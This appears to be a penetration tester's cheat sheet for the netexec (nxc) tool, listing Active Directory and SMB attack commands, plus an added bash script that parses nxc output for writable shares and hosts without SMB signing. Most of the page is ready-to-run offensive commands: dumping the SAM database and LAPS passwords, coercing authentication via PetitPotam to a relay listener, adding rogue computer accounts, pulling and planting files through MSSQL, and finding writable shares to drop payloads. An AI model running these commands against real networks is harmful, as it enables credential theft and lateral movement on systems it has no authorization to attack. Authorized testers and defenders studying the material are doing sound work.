#
netexec (nxc)
nxc "is a network service exploitation tool that helps automate assessing the security of large networks."
#
Basic SMB auth
nxc smb somehost -u user -p 'Winter2027!'
#
Basic SMB auth (Kerberos)
I like to use getTGT, then export KRB5CCNAME=user.ccache
and then here are some enumeration examples. Target hosts by name (FQDN), not IP, since the service ticket is tied to the host's SPN:
Enumerate domain users
nxc ldap domain.com --use-kcache --kdcHost domain.com --users
Connect to host with SMB:
nxc smb SOMECOOLSERVER --use-kcache
#
Turn on logging
To log every nxc command and output to a file, find the nxc.conf
file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:
log_mode = True
The log files land in ~/.nxc/logs/ with a timestamp in the file name.
#
Change the Pwn3d label
You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf
file and change:
pwn3d_label = Compromised!
#
Find shares
nxc smb pcs.txt -u 'username' -p 'password' --shares
#
Filtering shares
If you only want the shares you actually have READ or WRITE access to (dropping the ones you can list but not open):
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE
Or just WRITE:
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE
#
Cleaning up share list from log file
If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads. Two caveats: the log lines carry extra prefix fields, so check the column layout with head before trusting the awk field numbers, and a case-insensitive grep for "write" also matches share remarks that happen to contain the word.
grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt
#
Find hosts with/without SMB signing
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt
#
Find hosts with/without SMB signing (alternate way)
#
grep for anything where signing is set to false
First save the banner output. The signing flag is printed in the banner line, so a null session is enough:
nxc smb pcs.txt -u '' -p '' > signingcheck.txt
If you want to get kind of fancy-pantsy you can take that grep
to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name (the fourth column of nxc's output):
grep -i "signing:False" signingcheck.txt | sort -k4,4 > no-signing-for-these-folks.txt
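The two greps above (writable shares from a saved share listing, and hosts with signing disabled) both key on a substring of the whole line. Here is an added example, not code from the nxc project or the author of this page, that parses saved nxc smb output by column instead: the permissions column for WRITE, and the banner line for signing:False. It assumes nxc's console layout (PROTO IP PORT HOST SHARE PERMS REMARK) and takes an optional field offset for log_mode files, which prepend fields such as date and time. The sample output is constructed, not a real capture.

```shell
#!/usr/bin/env bash
# Added example, not code from nxc or the page author: parse saved nxc smb
# output once and pull out (a) shares you can WRITE to and (b) hosts whose
# banner says signing:False, keying on the right column instead of a bare
# substring (grep -i write also hits remarks like "Write-ups and installers").
#
# Assumed layout (nxc's console output): PROTO IP PORT HOST SHARE PERMS REMARK,
# PERMS being READ, WRITE or READ,WRITE. A log_mode file prepends fields
# (date, time, ...); pass that count as the second argument to shift columns.
set -u

# Constructed sample, not a real capture.
sample_nxc_output() {
cat <<'EOF'
SMB         10.10.10.5      445    FILES01          [*] Windows 10 / Server 2019 Build 17763 x64 (name:FILES01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.5      445    FILES01          [+] corp.local\lowpriv:Winter2026!
SMB         10.10.10.5      445    FILES01          [*] Enumerated shares
SMB         10.10.10.5      445    FILES01          Share           Permissions     Remark
SMB         10.10.10.5      445    FILES01          -----           -----------     ------
SMB         10.10.10.5      445    FILES01          ADMIN$                          Remote Admin
SMB         10.10.10.5      445    FILES01          C$                              Default share
SMB         10.10.10.5      445    FILES01          IPC$            READ            Remote IPC
SMB         10.10.10.5      445    FILES01          Public          READ,WRITE      Drop folder
SMB         10.10.10.5      445    FILES01          Scans           WRITE           Scanner output
SMB         10.10.10.5      445    FILES01          Software        READ            Write-ups and installers
SMB         10.10.10.7      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.7      445    DC01             [+] corp.local\lowpriv:Winter2026!
SMB         10.10.10.7      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.7      445    DC01             SYSVOL          READ            Logon server share
EOF
}

# writable_shares FILE [OFFSET]
# Prints one \\HOST\SHARE line per share whose PERMS column contains WRITE
# (as a whole token, so READ,WRITE and WRITE both count), sorted and unique.
writable_shares() {
    awk -v off="${2:-0}" '
        $(6+off) ~ /(^|,)WRITE(,|$)/ { printf "\\\\%s\\%s\n", $(4+off), $(5+off) }
    ' "$1" | sort -u
}

# relay_targets FILE [OFFSET]
# Prints the IP of every host whose banner line says (signing:False), unique.
relay_targets() {
    awk -v off="${2:-0}" '
        /\(signing:False\)/ { print $(2+off) }
    ' "$1" | sort -u
}

# Stand-alone run against the constructed sample.
tmp=$(mktemp)
sample_nxc_output > "$tmp"
echo "[writable shares]"; writable_shares "$tmp"
echo "[relay targets]";   relay_targets "$tmp"
rm -f "$tmp"
```

For a real run, replace the sample with `nxc smb pcs.txt -u user -p pass --shares > shares.txt` and call `writable_shares shares.txt`; for a log_mode file with a leading date and time, call `writable_shares log.log 2`. Note the Software share in the sample: `grep -i write` would list it, but its permission column is READ, so the parser correctly leaves it out.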
#
Find hosts running WebClient service
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav
#
Find pre-created computer accounts
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k
#
Dump SAM database
This needs local admin on the target (the account should show up as Pwn3d!); a true low-priv user will get access denied:
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam
#
Coerce authentication
The nxc wiki has an interesting page on this, covering the various ways nxc can coerce authentication (LISTENER is the IP your relay or capture listener, e.g. ntlmrelayx or Responder, is running on).
NOTE (from the nxc wiki)
Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.
This also applies to the names of the vulnerabilities when specifying a method.
M=p // Invalid, as both petitpotam and printerbug start with 'p', so the module gives an error
M=pr // Matches printerbug
M=pe // Matches petitpotam
M=dfs // Matches dfscoerce
#
Coerce via PetitPotam:
nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe
#
Add computer to the domain
nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!
Remember to remove it when you're done (same module with -o NAME=YOURMOM DELETE=True).
#
MSSQL commands
Lifted from the nxc wiki
#
Execute database commands
--local-auth means SQL Server authentication (a SQL login such as sa) rather than Windows/domain authentication:
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
#
Get/put files
Get (remote path first, then the local destination):
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file.txt /tmp/file
Put (local path first, then the remote destination):
nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
#
Dump LAPS passwords
Using an account with rights to do so:
nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps